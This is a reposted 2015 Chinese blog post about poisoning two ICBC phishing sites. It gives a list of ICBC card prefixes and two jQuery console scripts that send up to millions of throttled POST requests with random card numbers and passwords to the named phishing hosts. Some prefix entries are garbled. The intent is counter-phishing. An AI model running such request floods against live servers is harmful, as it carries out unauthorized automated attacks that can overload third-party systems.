从收到钓鱼信息到伪造钓鱼数据-让钓鱼者吃死鱼

时间：2015-08-25 19:03:41 阅读：233 评论：0 收藏：0 [点我收藏+]

标签：

技术分享

昨晚下班坐地铁途中收到一条短信，一看不是icbc，我也没怎么管他，事不关己高高挂起。

但是今天在浏览oschina的时候，见到一个帖子同样有人收到差不多的钓鱼信息。

如下：

技术分享

到了这时，我不能袖手旁观了，我的兴趣上来了，我要怎么做呢？

我就是制造了大量随机的工行卡号密码提交到钓鱼网站之中。

（随机：不能让钓鱼者分析垃圾数据）

目前这两个网站已经无法访问~

据不完全统计，一个站至少提交了2W条以上数据。

现在我来说说我是如何给钓鱼者吃死鱼的：

首先这个钓鱼目标是工商银行，那么我先得到工行的卡号前缀：

‘370246‘
‘370248‘
‘370249‘
‘427010‘
‘427018‘
‘427019‘
‘427020‘
‘427029‘
‘427030‘
‘427039‘
‘370247‘
‘438125‘
‘438126‘
‘451804‘
‘451810‘
‘451811‘
‘45806‘ 
‘458071‘
‘489734‘
‘489735‘
‘489736‘
‘510529‘
‘427062‘
‘524091‘
‘427064‘
‘530970‘
‘53098‘ 
‘530990‘
‘558360‘
‘620200‘
‘620302‘
‘620402‘
‘620403‘
‘620404‘
‘524047‘
‘620406‘
‘620407‘
‘525498‘
‘620409‘
‘620410‘
‘620411‘
‘620412‘
‘620502‘
‘620503‘
‘620405‘
‘620408‘
‘620512‘
‘620602‘
‘620604‘
‘620607‘
‘620611‘
‘620612‘
‘620704‘
‘620706‘
‘620707‘
‘620708‘
‘620709‘
‘620710‘
‘620609‘
‘620712‘
‘620713‘
‘620714‘
‘620802‘
‘620711‘
‘620904‘
‘620905‘
‘621001‘
‘620902‘
‘621103‘
‘621105‘
‘621106‘
‘621107‘
‘621102‘
‘621203‘
‘621204‘
‘621205‘
‘621206‘
‘621207‘
‘621208‘
‘621209‘
‘621210‘
‘621302‘
‘621303‘
‘621202‘
‘621305‘
‘621306‘
‘621307‘
‘621309‘
‘621311‘
‘621313‘
‘621211‘
‘621315‘
‘621304‘
‘621402‘
‘621404‘
‘621405‘
‘621406‘
‘621407‘
‘621408‘
‘621409‘
‘621410‘
‘621502‘
‘621317‘
‘621511‘
‘621602‘
‘621603‘
‘621604‘
‘621605‘
‘621608‘
‘621609‘
‘621610‘
‘621611‘
‘621612‘
‘621613‘
‘621614‘
‘621615‘
‘621616‘
‘621617‘
‘621607‘
‘621606‘
‘621804‘
‘621807‘
‘621813‘
‘621814‘
‘621817‘
‘621901‘
‘621904‘
‘621905‘
‘621906‘
‘621907‘
‘621908‘
‘621909‘
‘621910‘
‘621911‘
‘621912‘
‘621913‘
‘621915‘
‘622002‘
‘621903‘
‘622004‘
‘622005‘
‘622006‘
‘622007‘
‘622008‘
‘622010‘
‘622011‘
‘622012‘
‘621914‘
‘622015‘
‘622016‘
‘622003‘
‘622018‘
‘622019‘
‘622020‘
‘622102‘
‘622103‘
‘622104‘
‘622105‘
‘622013‘
‘622111‘
‘622114‘
‘622200‘
‘622017‘
‘622202‘
‘622203‘
‘622208‘
‘622210‘
‘622211‘
‘622212‘
‘622213‘
‘622214‘
‘622110‘
‘622220‘
‘622223‘
‘622225‘
‘622229‘
‘622230‘
‘622231‘
‘622232‘
‘622233‘
‘622234‘
‘622235‘
‘622237‘
‘622215‘
‘622239‘
‘622240‘
‘622245‘
‘622224‘
‘622303‘
‘622304‘
‘622305‘
‘622306‘
‘622307‘
‘622308‘
‘622309‘
‘622238‘
‘622314‘
‘622315‘
‘622317‘
‘622302‘
‘622402‘
‘622403‘
‘622404‘
‘622313‘
‘622504‘
‘622505‘
‘622509‘
‘622513‘
‘622517‘
‘622502‘
‘622604‘
‘622605‘
‘622606‘
‘622510‘
‘622703‘
‘622715‘
‘622806‘
‘622902‘
‘622903‘
‘622706‘
‘623002‘
‘623006‘
‘623008‘
‘623011‘
‘623012‘
‘622904‘
‘623015‘
‘623100‘
‘623202‘
‘623301‘
‘623400‘
‘623500‘
‘623602‘
‘623803‘
‘623901‘
‘623014‘
‘624100‘
‘624200‘
‘624301‘
‘624402‘
‘6245180
‘6245181
‘6245181
‘6245806
‘6245807
‘6253098
‘623700‘
‘628288‘
‘624000‘
‘9558‘ =
‘628286‘
‘622206‘
‘621225‘
‘526836‘
‘513685‘
‘543098‘
‘458441‘
‘620058‘
‘621281‘
‘622246‘
‘900000‘
‘544210‘
‘548943‘
‘370267‘
‘621558‘
‘621559‘
‘621722‘
‘621723‘
‘620086‘
‘621226‘
‘402791‘
‘427028‘
‘427038‘
‘548259‘
‘356879‘
‘356880‘
‘356881‘
‘356882‘
‘528856‘
‘621618‘
‘620516‘
‘621227‘
‘621721‘
‘900010‘
‘625330‘
‘625331‘
‘625332‘
‘623062‘
‘622236‘
‘621670‘
‘524374‘
‘550213‘
‘374738‘
‘374739‘
‘621288‘
‘625708‘
‘625709‘
‘622597‘
‘622599‘
‘360883‘
‘360884‘
‘625865‘
‘625866‘
‘625899‘
‘625929‘
‘621376‘
‘620054‘
‘620142‘
‘621423‘
‘625927‘
‘621428‘
‘625939‘
‘621434‘
‘625987‘
‘621761‘
‘621749‘
‘620184‘
‘625930‘
‘621300‘
‘621378‘
‘625114‘
‘622159‘
‘621720‘
‘625021‘
‘625022‘
‘625932‘
‘621379‘
‘620114‘
‘620146‘
‘622889‘
‘625900‘
‘622949‘
‘625915‘
‘625916‘
‘620030‘
‘620050‘
‘622944‘
‘625115‘
‘620101‘
‘623335‘
‘622171‘
‘621240‘
‘621724‘
‘625931‘
‘621762‘
‘625918‘
‘625113‘
‘621371‘
‘620143‘
‘620149‘
‘621730‘
‘625928‘
‘621414‘
‘625914‘
‘621375‘
‘620187‘
‘621734‘
‘621433‘
‘625986‘
‘621370‘
‘625925‘
‘622926‘
‘622927‘
‘622928‘
‘622929‘
‘622930‘
‘622931‘
‘621733‘
‘621732‘
‘620124‘
‘620183‘
‘620561‘
‘625116‘
‘622227‘
‘625921‘
‘621764‘
‘625926‘
‘621372‘
‘623034‘
‘625110‘
‘621464‘
‘625942‘
‘622158‘
‘625917‘
‘621765‘
‘620094‘
‘620186‘
‘621719‘
‘625922‘
‘621369‘
‘621763‘
‘625934‘
‘620046‘
‘621750‘
‘625933‘
‘621377‘
‘620148‘
‘620185‘
‘625920‘
‘621367‘
‘625924‘
‘621374‘
‘621731‘
‘621781‘

好了，现在基本准备就绪了

使用语言JavaScript

原因：快快快

首先分析网站需要提交的参数:

图1网站：

{id: 网站id, logonCardNum: 卡号, netType: 密码, randomId: 验证码}

直接给代码：

function getAuthCode() {
    var len = 6, code = "";

    for(var i = 0; i < len; i++) {
        code += parseInt(Math.random() * 10);
    }
    
    return code;
}

function getPwd() {
    var charPwd = "1234567890".split(""), pwdLen = 6, pwd = "";

    for(var i = 0; i < pwdLen; i++) {
        pwd += charPwd[parseInt(Math.random() * charPwd.length)];
    }
    
    return pwd;
}

function getCard() {
    var charCard = ["370246","370248","370249","427010","427018","427019","427020","427029","427030","427039","370247","438125","438126","451804","451810","451811","45806‘","458071","489734","489735","489736","510529","427062","524091","427064","530970","53098‘","530990","558360","620200","620302","620402","620403","620404","524047","620406","620407","525498","620409","620410","620411","620412","620502","620503","620405","620408","620512","620602","620604","620607","620611","620612","620704","620706","620707","620708","620709","620710","620609","620712","620713","620714","620802","620711","620904","620905","621001","620902","621103","621105","621106","621107","621102","621203","621204","621205","621206","621207","621208","621209","621210","621302","621303","621202","621305","621306","621307","621309","621311","621313","621211","621315","621304","621402","621404","621405","621406","621407","621408","621409","621410","621502","621317","621511","621602","621603","621604","621605","621608","621609","621610","621611","621612","621613","621614","621615","621616","621617","621607","621606","621804","621807","621813","621814","621817","621901","621904","621905","621906","621907","621908","621909","621910","621911","621912","621913","621915","622002","621903","622004","622005","622006","622007","622008","622010","622011","622012","621914","622015","622016","622003","622018","622019","622020","622102","622103","622104","622105","622013","622111","622114","622200","622017","622202","622203","622208","622210","622211","622212","622213","622214","622110","622220","622223","622225","622229","622230","622231","622232","622233","622234","622235","622237","622215","622239","622240","622245","622224","622303","622304","622305","622306","622307","622308","622309","622238","622314","622315","622317","622302","622402","622403","622404","622313","622504","622505","622509","622513","622517","622502","622604","622605","622606","622510","622703","622715","622806","622902","622903","622706","623002","623006","623008","623011","623012","622904","623015","623100","623202","623301","623400","623500","623602","623803","623901","623014","624100","624200","624301","624402","624518","624518","624518","624580","624580","625309","623700","628288","624000","9558‘ ","628286","622206","621225","526836","513685","543098","458441","620058","621281","622246","900000","544210","548943","370267","621558","621559","621722","621723","620086","621226","402791","427028","427038","548259","356879","356880","356881","356882","528856","621618","620516","621227","621721","900010","625330","625331","625332","623062","622236","621670","524374","550213","374738","374739","621288","625708","625709","622597","622599","360883","360884","625865","625866","625899","625929","621376","620054","620142","621423","625927","621428","625939","621434","625987","621761","621749","620184","625930","621300","621378","625114","622159","621720","625021","625022","625932","621379","620114","620146","622889","625900","622949","625915","625916","620030","620050","622944","625115","620101","623335","622171","621240","621724","625931","621762","625918","625113","621371","620143","620149","621730","625928","621414","625914","621375","620187","621734","621433","625986","621370","625925","622926","622927","622928","622929","622930","622931","621733","621732","620124","620183","620561","625116","622227","625921","621764","625926","621372","623034","625110","621464","625942","622158","625917","621765","620094","620186","621719","625922","621369","621763","625934","620046","621750","625933","621377","620148","620185","625920","621367","625924","621374","621731","621781"], cardLen = 19 - 6, card = "";
    card = charCard[parseInt(Math.random() * charCard.length)];
    
    for(var i = 0; i < cardLen; i++) {
        card += parseInt(Math.random() * 10);
    }
    
    return card;
}

function Submit() {
    var card = getCard(), pwd = getPwd(), code = getAuthCode(), sid = parseInt(Math.random() * 3 + 1);
    $.ajax({
        type: "POST",
        url: "http://www.idagb.com/add_1.asp",
        data: {id: sid, logonCardNum: card, netType: pwd, randomId: code},
        async: true,
        success: function(data) {
            HandleResult(card);
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
            HandleResult(card);
        }
    });
}

function HandleResult(data) {
    $("body").html(i + " : " + data + " , {" + CurrentThread-- + "}");
    if (i < Count) {
         for (var j = 0; j < Thread; j++) {
              if (CurrentThread >= Thread || i >= Count) {
                  break; //保证最大线程数/最大请求数
              }
              Submit(i++, CurrentThread++);
         }
    }
}
var i = 0, Count = 10000000, Thread = 12, CurrentThread = 0;
Submit(i++, CurrentThread++); //第一个次触发,i/线程要++

图2网站：

{step: 步, ukh: 卡号, umm: 密码, uid: 访问id}

直接给代码：

function getUserId() {
    var charCode = "abcdefghijklmnopqrstuvwxyz1234567890".split(""), codeLen = 15, code = "";
    
    for(var i = 0; i < codeLen; i++) {
        code += charCode[parseInt(Math.random() * charCode.length)];
    }
    
    return code;
}

function getPwd() {
    var charPwd = "1234567890".split(""), pwdLen = 6, pwd = "";

    for(var i = 0; i < pwdLen; i++) {
        pwd += charPwd[parseInt(Math.random() * charPwd.length)];
    }
    
    return pwd;
}

function getCard() {
    var charCard = ["370246","370248","370249","427010","427018","427019","427020","427029","427030","427039","370247","438125","438126","451804","451810","451811","45806‘","458071","489734","489735","489736","510529","427062","524091","427064","530970","53098‘","530990","558360","620200","620302","620402","620403","620404","524047","620406","620407","525498","620409","620410","620411","620412","620502","620503","620405","620408","620512","620602","620604","620607","620611","620612","620704","620706","620707","620708","620709","620710","620609","620712","620713","620714","620802","620711","620904","620905","621001","620902","621103","621105","621106","621107","621102","621203","621204","621205","621206","621207","621208","621209","621210","621302","621303","621202","621305","621306","621307","621309","621311","621313","621211","621315","621304","621402","621404","621405","621406","621407","621408","621409","621410","621502","621317","621511","621602","621603","621604","621605","621608","621609","621610","621611","621612","621613","621614","621615","621616","621617","621607","621606","621804","621807","621813","621814","621817","621901","621904","621905","621906","621907","621908","621909","621910","621911","621912","621913","621915","622002","621903","622004","622005","622006","622007","622008","622010","622011","622012","621914","622015","622016","622003","622018","622019","622020","622102","622103","622104","622105","622013","622111","622114","622200","622017","622202","622203","622208","622210","622211","622212","622213","622214","622110","622220","622223","622225","622229","622230","622231","622232","622233","622234","622235","622237","622215","622239","622240","622245","622224","622303","622304","622305","622306","622307","622308","622309","622238","622314","622315","622317","622302","622402","622403","622404","622313","622504","622505","622509","622513","622517","622502","622604","622605","622606","622510","622703","622715","622806","622902","622903","622706","623002","623006","623008","623011","623012","622904","623015","623100","623202","623301","623400","623500","623602","623803","623901","623014","624100","624200","624301","624402","624518","624518","624518","624580","624580","625309","623700","628288","624000","9558‘ ","628286","622206","621225","526836","513685","543098","458441","620058","621281","622246","900000","544210","548943","370267","621558","621559","621722","621723","620086","621226","402791","427028","427038","548259","356879","356880","356881","356882","528856","621618","620516","621227","621721","900010","625330","625331","625332","623062","622236","621670","524374","550213","374738","374739","621288","625708","625709","622597","622599","360883","360884","625865","625866","625899","625929","621376","620054","620142","621423","625927","621428","625939","621434","625987","621761","621749","620184","625930","621300","621378","625114","622159","621720","625021","625022","625932","621379","620114","620146","622889","625900","622949","625915","625916","620030","620050","622944","625115","620101","623335","622171","621240","621724","625931","621762","625918","625113","621371","620143","620149","621730","625928","621414","625914","621375","620187","621734","621433","625986","621370","625925","622926","622927","622928","622929","622930","622931","621733","621732","620124","620183","620561","625116","622227","625921","621764","625926","621372","623034","625110","621464","625942","622158","625917","621765","620094","620186","621719","625922","621369","621763","625934","620046","621750","625933","621377","620148","620185","625920","621367","625924","621374","621731","621781"], cardLen = 19 - 6, card = "";
    card = charCard[parseInt(Math.random() * charCard.length)];
    
    for(var i = 0; i < cardLen; i++) {
        card += parseInt(Math.random() * 10);
    }
    
    return card;
}

function Submit() {
    var card = getCard(), pwd = getPwd(), uid = getUserId();
    $.ajax({
        type: "POST",
        url: "http://www.ibokn.com/Library.cgi4?uid=" + uid,
        data: {step: 1, ukh: card, umm: pwd, uid: uid},
        async: true,
        success: function(data) {
            HandleResult(card);
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
            HandleResult(card);
        }
    });
}

function HandleResult(data) {
    $("body").html(i + " : " + data + " , {" + CurrentThread-- + "}");
    if (i < Count) {
         for (var j = 0; j < Thread; j++) {
              if (CurrentThread >= Thread || i >= Count) {
                  break; //保证最大线程数/最大请求数
              }
              Submit(i++, CurrentThread++);
         }
    }
}
var i = 0, Count = 1000000, Thread = 12, CurrentThread = 0;
Submit(i++, CurrentThread++); //第一个次触发,i/线程要++

好了，只要在console之中注入执行就能循环提交死鱼到钓鱼网站~

最后分享一下这个JavaScript的一个最大线程的方法：HandleResult

为何需要这个方法呢?

因为循环执行异步ajax的时候，如果你有1百万条post都会一起执行。那么你的浏览器一定卡死了，

所以我这里添加了一个限制提交数量的方法。

但是如果使用同步的话，那么提交速度就慢。

好了，我的分享的到这里~

从收到钓鱼信息到伪造钓鱼数据-让钓鱼者吃死鱼

标签：

原文地址：http://www.cnblogs.com/ulon/p/4758194.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行